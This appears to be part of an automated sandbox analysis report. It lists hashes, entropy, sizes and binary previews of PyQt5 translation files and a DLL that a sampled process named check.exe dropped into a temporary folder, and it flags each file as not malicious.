SSDEEP:	3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
MD5:	53A85F51054B7D58D8AD7C36975ACB96
SHA1:	893A757CA01472A96FB913D436AA9F8CFB2A297F
SHA-256:	D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
SHA-512:	35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_ar.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	130
Entropy (8bit):	4.024232093209084
Encrypted:	false
SSDEEP:	3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
MD5:	8FF05B56C0995F90A80B7064AA6E915C
SHA1:	D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
SHA-256:	A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
SHA-512:	5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_bg.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6813848812976975
Encrypted:	false
SSDEEP:	3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
MD5:	466EED6C184D2055488D4C5EA9AE5F20
SHA1:	8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
SHA-256:	9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
SHA-512:	D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_ca.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.631479835393124
Encrypted:	false
SSDEEP:	3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
MD5:	6FBA66FE449866B478A2EBA66A724A02
SHA1:	EBEF6ED8460218CE8DF735659A8CBCD693600AC6
SHA-256:	171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
SHA-512:	2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_cs.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	157
Entropy (8bit):	3.7483537099309427
Encrypted:	false
SSDEEP:	3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
MD5:	D033053C03C3ECFA2AA926E0E674F67F
SHA1:	B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
SHA-256:	3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
SHA-512:	2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_da.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6174817344122334
Encrypted:	false
SSDEEP:	3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
MD5:	E6A683F4A0883B5B0C7D30B847EF208C
SHA1:	FF2440DBBFE04AD86C6F285426AAFD49A895B128
SHA-256:	B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
SHA-512:	D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_de.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6174817344122334
Encrypted:	false
SSDEEP:	3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
MD5:	06168E1261BF72F49F94927723B2E1EB
SHA1:	DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
SHA-256:	5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
SHA-512:	AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_en.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:j2wZC4n:CwZ
MD5:	BCEBCF42735C6849BDECBB77451021DD
SHA1:	4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
SHA-256:	9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
SHA-512:	F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_es.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.6070658648473097
Encrypted:	false
SSDEEP:	3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
MD5:	EE47DFADBA4414FDC051C5CFBE71DDC1
SHA1:	DE650E96A9C130D35F8A498202773EF7FC875D27
SHA-256:	E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
SHA-512:	8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_fa.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	293121
Entropy (8bit):	5.272179385890926
Encrypted:	false
SSDEEP:	3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
MD5:	F9C3624197ACB30A9E6CC799BB65BED6
SHA1:	D715EAE24387DE15588F68C92991A93FAFB5EEAB
SHA-256:	B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
SHA-512:	199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......\|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...\|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_fi.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	117
Entropy (8bit):	3.739162292019161
Encrypted:	false
SSDEEP:	3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
MD5:	72882942B07B8AAC98034016E752B1A0
SHA1:	BF23B4C136B863B10E770019A2DF62FC988859DF
SHA-256:	048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
SHA-512:	403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_fr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.680458675741643
Encrypted:	false
SSDEEP:	3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
MD5:	3C45C665CFE036A7474CB4DCBB13CF40
SHA1:	62312DFF3C4CD38BAE8456C981601D0D89600F63
SHA-256:	8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
SHA-512:	21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_gd.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.463523104731333
Encrypted:	false
SSDEEP:	3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
MD5:	A8D55457C0413893F746D40B637F9C93
SHA1:	25123615482947772176E055E4A74043B2FBCAA0
SHA-256:	49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
SHA-512:	99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_gl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	323590
Entropy (8bit):	4.568068046062524
Encrypted:	false
SSDEEP:	3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
MD5:	0661FFABFBC50187F3BA38876B721946
SHA1:	EB5E7205355CFC6BCB4DF27E224079842C97B296
SHA-256:	204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
SHA-512:	65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gl_ESB..I...........+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9......................)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_he.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	83
Entropy (8bit):	3.880645689209568
Encrypted:	false
SSDEEP:	3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
MD5:	DD5C2C6B148F2DB3E666B859776AE129
SHA1:	8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
SHA-256:	C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
SHA-512:	2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_ar.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	8743
Entropy (8bit):	5.189558605179696
Encrypted:	false
SSDEEP:	192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
MD5:	CCD39A7C8139AD041E31B3E5D40968B4
SHA1:	5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
SHA-256:	222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
SHA-512:	9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......arB.....(.....d.0T.....5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................\|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8..9.0.Q.1. .F.3... .E.D.A.Q. .'.D..Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler........9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>..9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L..9.0.Q.1. .*.

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_bg.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10599
Entropy (8bit):	5.192287379770591
Encrypted:	false
SSDEEP:	192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
MD5:	5538049DA3A1D1D724AB6E11D2E2EDBE
SHA1:	7256BE390B88A053C0252488C443BE42F6F2D92A
SHA-256:	CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
SHA-512:	DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....\|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_ca.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7444
Entropy (8bit):	4.580794980254807
Encrypted:	false
SSDEEP:	192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
MD5:	66722ED97BCBFD3DAE3C8264413859AB
SHA1:	400A93B213FCF9BBC9785881EA82ADB9F444CD6C
SHA-256:	ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
SHA-512:	B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_cs.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	15297
Entropy (8bit):	4.708378368926237
Encrypted:	false
SSDEEP:	384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
MD5:	ED228F0F60AE9AEC28AB9171D5AE9590
SHA1:	7F061CF0C699D125A5531E3480C21964452F45EA
SHA-256:	4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
SHA-512:	794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!......K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_da.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	4795
Entropy (8bit):	4.530246422531362
Encrypted:	false
SSDEEP:	96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
MD5:	1D09BEE1FB55A173F7EB39B9A662A170
SHA1:	C77F0A148262A91679F19689E4790B754D45D5D5
SHA-256:	6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
SHA-512:	BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....\|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_de.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7570
Entropy (8bit):	4.550982634910665
Encrypted:	false
SSDEEP:	96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
MD5:	3B070D169E3381E2FB081172934AAD00
SHA1:	70886EB7EF566B296D0814BD4C2440AC176699D6
SHA-256:	9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
SHA-512:	271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....\|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qt_help_en.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
